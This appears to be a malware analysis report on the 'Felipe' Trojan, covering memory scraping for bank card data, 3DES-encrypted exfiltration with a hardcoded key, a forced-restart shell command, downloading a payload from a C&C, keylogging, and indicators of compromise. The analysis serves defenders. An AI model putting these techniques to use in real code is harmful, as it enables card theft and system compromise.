The Felipe Trojan dumps process memory by walking the address ranges that can hold data. When a process starts, the system allocates memory for its heap, stack, and other regions, but Windows does not allocate one contiguous block; it hands out whatever free user-mode memory is available, so the malware has to scan the process's address space region by region. The following are the methods used for the memory dump:
GetSystemInfo() Retrieves general information about the system in a structure called SYSTEM_INFO. This structure contains two members, minimumApplicationAddress and maximumApplicationAddress, which hold the lowest and highest addresses at which the system can allocate memory for user-mode applications.
VirtualQueryEx() Gets information about a range of memory addresses and returns it in a structure named MEMORY_BASIC_INFORMATION. It describes the memory region that starts at the specified address.
ReadProcessMemory() Reads a number of bytes starting from a specific memory address in another process.
OpenProcess() Opens an existing process and returns a handle to it; the process must be opened before its memory can be read.
WriteProcessMemory() Writes data to an area of memory in a specified process.
After the memory dump, the malware tries to find the victim's used bank card from memory, and fetches this information to send to the C&C. Below is a snapshot of it:
Encryption method for sending data to C&C:
The malware uses the Triple Data Encryption Standard (3DES) algorithm. The first step is to create a simple wrapper class that encapsulates the 3DES algorithm and stores the encrypted data as a Base64-encoded string. That wrapper is then used to store private user data in a publicly accessible text file.
The 3DES algorithm provides two-way encryption: the wrapper derives its key from a private key string, and the same string is required to decrypt the data. Here, the malware uses "L%f@Y7Boolean4%()F$y" as the private key.
For more info: https://docs.microsoft.com/en-us/dotnet/visual-basic/programming-guide/language-features/strings/walkthrough-encrypting-and-decrypting-strings
Sending data to the C&C:
The malware uses the free “geoPlugin” web service to determine the victim's system and location information. The following are the services used by the malware from the geoPlugin web service:
System IP
City
Region code
Country name
Timer Set:
The malware sets a time in the program at which the system is shut down and restarted on a specific day. In this sample, if the current time is between 5:06 a.m. and 6:09 a.m. on a Friday, the system is shut down.
The command to shutdown is:
Interaction.Shell("shutdown /r /t 0", AppWinStyle.MinimizedFocus, false, -1);
Switches:
/r: shut down and then restart the local computer
/t: time, in seconds, between the execution of the shutdown command and the actual shutdown or restart
AppWinStyle.MinimizedFocus: starts the program minimized and with focus
After the restart, the malware fetches hardware information from the victim's system, including the serial number and running processes. If the “explorer32.exe” process is not found in the running processes, the malware downloads from the C&C and executes it from the temp folder for performing further malicious activities.
It uses the GetAsyncKeyState() Win API to query the state of each key on the keyboard. From the return value of GetAsyncKeyState(), it can be determined whether the key is up or down at the time the function is called.
Network communication:
Indicators of Compromise:
Filename          Md5
vshost.exe        15CE8F849FFF4CC8675900EC838A93F9
down.exe          61B06E49D514F3DC5BE4F4EF08F6B43C
explorer32.exe    D912771C8CD5720AD835E08EB80A77B6
install2.bat      7D016A3BB29904A6E00161694FC6AB4E
Download URLs:
192.99.215[.]95/uploads
Inmemory[.]tech
